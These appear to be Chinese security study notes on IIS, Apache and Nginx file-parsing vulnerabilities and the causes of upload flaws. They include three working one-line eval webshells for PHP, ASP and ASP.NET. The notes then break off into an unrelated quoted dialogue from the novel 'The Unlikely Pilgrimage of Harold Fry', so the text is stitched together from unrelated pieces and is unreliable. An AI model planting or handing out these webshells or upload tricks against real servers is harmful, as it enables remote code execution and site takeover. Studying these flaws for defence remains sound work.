解析漏洞
IIS 解析漏洞
IIS6.0 存在两个漏洞:
1.当建立*.asa,*.asp格式的文件夹时,其目录下的任意文件都被IIS当作asp 文件解析
2.当文件为*.asp;1.jpg 时,IIS同样会以ASP脚本来执行
---经典漏洞:WebDav
Apache 解析漏洞
Apache在解析文件时,当碰到不认识的扩展名时,会从后向前解析,直到碰到的扩展名为止,如都不认识,将会暴露其源码。
PHP CGI 解析漏洞 / Nginx 解析漏洞
一句话木马:
PHP: <?php @eval($_POST[‘chopper’]);?> ASP: <%eval request(“chopper”)%> ASP.NET <%@ Page Language=”Jscript”%><%eval (Request.Item[“chopper”],”unsafe”);%>
上传漏洞最终的形成原因主要有以下两点:
- 目录过滤不严,攻击者可能建立畸形目录
- 文件未重命名,攻击者可能利用Web容器解析漏洞
他问:”你知道我失去她后最后会的是什么吗?“她摇摇头。
”我最后悔没有搏一搏。”
”伊丽莎白得的是脑癌,雷克斯。你可以怎么搏?”
”医生说她会死的时候,我只是握着她的手,选择了放弃。我们都放弃了。我知道这也许不会改变什么,但真希望当时我让她看见我有多么想留住她。莫林,我应该大怒一场的。”
摘自《一个人的朝圣》 . 20 莫琳与公关代表